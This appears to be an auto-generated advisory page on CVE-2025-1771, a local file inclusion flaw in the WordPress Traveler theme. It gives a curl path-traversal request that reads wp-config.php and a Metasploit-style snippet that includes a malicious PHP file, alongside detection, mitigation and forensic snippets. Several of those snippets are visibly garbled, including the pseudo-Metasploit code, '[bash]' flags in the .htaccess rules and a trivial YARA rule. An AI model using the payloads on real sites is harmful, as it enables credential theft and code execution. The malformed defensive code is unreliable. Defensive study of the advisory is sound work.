WordPress Traveler Theme, Local File Inclusion, CVE-2025-1771 (Critical)

How CVE-2025-1771 Works

The vulnerability exists in the `hotel_alone_load_more_post` function of the Traveler theme (≤ v3.1.8), where user-supplied input via the `style` parameter is improperly sanitized. Attackers can manipulate this parameter to perform path traversal (e.g., ../../../wp-config.php) and include arbitrary local files. If PHP files are included, server-side code execution occurs. This flaw bypasses authentication, enabling attackers to leak sensitive data (database credentials, user info) or execute malicious payloads if file uploads are permitted.

DailyCVE Form

Platform: WordPress
Version: ≤ 3.1.8
Vulnerability: LFI
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploitation

1. Curl PoC:

curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-d "action=hotel_alone_load_more_post&style=../../../wp-config.php"

2. Metasploit Module:

module.exploit('wordpress/traveler_lfi') do |r|
r.target_uri.path = '/wp-admin/admin-ajax.php'
r.post_data = { 'action' => 'hotel_alone_load_more_post', 'style' => '../../malicious.php' }
end

Detection

1. Log Analysis:

grep "hotel_alone_load_more_post.style=" /var/log/apache2/access.log

2. WAF Rule:

if ($args ~ "style=.../") { return 403; }

Mitigation

1. Patch: Upgrade to Traveler Theme > v3.1.8.

2. .htaccess Restriction:

<FilesMatch "admin-ajax\.php">
RewriteCond %{QUERY_STRING} style=.../ [bash]
RewriteRule ^ - [bash]
</FilesMatch>

3. PHP Hardening:

// Disable remote/file inclusion
php_admin_flag allow_url_include off

Forensics

1. Timeline Analysis:

find /var/www/html -type f -name ".php" -mtime -7 -exec ls -la {} \;

2. YARA Rule:

rule traveler_lfi {
strings: $s = "hotel_alone_load_more_post"
condition: $s and all of them
}

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1771
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top